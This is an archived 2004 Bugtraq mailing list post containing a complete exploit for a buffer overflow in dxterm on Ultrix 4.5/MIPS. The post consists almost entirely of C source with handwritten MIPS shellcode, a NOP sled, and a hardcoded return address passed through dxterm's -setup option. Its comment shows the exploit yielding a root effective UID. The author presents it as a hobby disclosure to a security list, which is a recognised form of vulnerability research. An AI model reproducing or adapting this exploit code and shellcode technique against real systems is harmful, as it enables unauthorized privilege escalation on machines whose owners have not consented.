lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.58.0412191443510.21128@kiosken.amiga-cg.se>
Date: Sun, 19 Dec 2004 14:47:01 +0100 (CET)
From: Kristoffer Brånemyr <ztion@...pnet.se>
To: bugtraq@...urityfocus.com
Subject: Exploit for Ultrix 4.5 dxterm


Well,

I hadn't seen a buffer overflow exploit for ultrix on bugtraq, so I
decided to make one. I don't think anyone is using ultrix seriously
anymore, so this is just for fun ;).

-- cut here --

/* Ultrix 4.5/MIPS dxterm exploit
   by ztion in 2004
   Greets to: Stok, sidez

   It wasn't possible to use '/' in the shellcode. Probably dxterm only
   copies everything after the last slash, as it expects a path.
   Since everything is pretty much hardcoded, you will probably have to
   tweak it for versions other than 4.5

   nora> ./ultrix_dxterm_4.5_exploit
   $ id
   uid=268(ztion) gid=15(users)euid=0(root)
 */

#include <stdio.h>

#define NOP 0x25f8e003
#define RET 0x7fffbe90

char shellcode[] = {
	0x69,0x6e,0x19,0x3c,	/* lui	 $t9, 0x6e69 */
	0x2e,0x61,0x39,0x37,	/* ori	 $t9, $t9, 0x612e */
	0x38,0x01,0xb6,0x23,	/* addi	 $s6, $sp, 312 */
	0x01,0x01,0x39,0x23,	/* addi	 $t9, $t9, 0x0101 */
	0xf0,0xfe,0xd9,0xae,	/* sw	 $t9, -272($s6) */
	0x73,0x68,0x19,0x3c,	/* lui	 $t9, 0x6873 */
	0x11,0x11,0x06,0x24,	/* li	 $a2, 0x1111 */
	0x11,0x11,0xc6,0x38,	/* xori	 $a2, $a2, 0x1111 */
	0x2e,0x2e,0x39,0x37,	/* ori	 $t9, $t9, 0x2e2e */
	0xf0,0xfe,0xc4,0x26,	/* addiu $a0, $s6, -272 */
	0x01,0x01,0x39,0x23,	/* addi	 $t9, $t9, 0x0101 */
	0x3f,0x01,0x02,0x24,	/* li	 $v0, 319 */
	0xfc,0xfe,0x42,0x20,	/* addi	 $v0, $v0, -260 */
	0xf4,0xfe,0xd9,0xae,	/* sw	 $t9, -268($s6) */
	0xe8,0xfe,0xc4,0xae,	/* sw	 $a0, -280($s6) */
	0xf8,0xfe,0xc6,0xae,	/* sw	 $a2, -264($s6) */
	0xec,0xfe,0xc6,0xae,	/* sw	 $a2, -276($s6) */
	0xe8,0xfe,0xc5,0x26,	/* addiu $a1, $s6, -280 */
	0xcc,0xff,0xff,0x01	/* syscall */

};

int main(void)
{
	char buf[256];
	int i;


	memset (buf, 2, 255);
	i = 0;
	while (i <= 8) {
		((int *)(buf+1))[i] = NOP;
		i++;
	}

	memcpy (buf+33, shellcode, sizeof(shellcode));

	((int *)(buf+3))[29] = RET;
	/* 119 - 122 is the return address */
	buf[123] = '\0';

	execl ("/usr/bin/dxterm", "dxterm", "-display", "localhost:0", "-setup", buf, NULL);
}


--
/Kristoffer Brånemyr


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ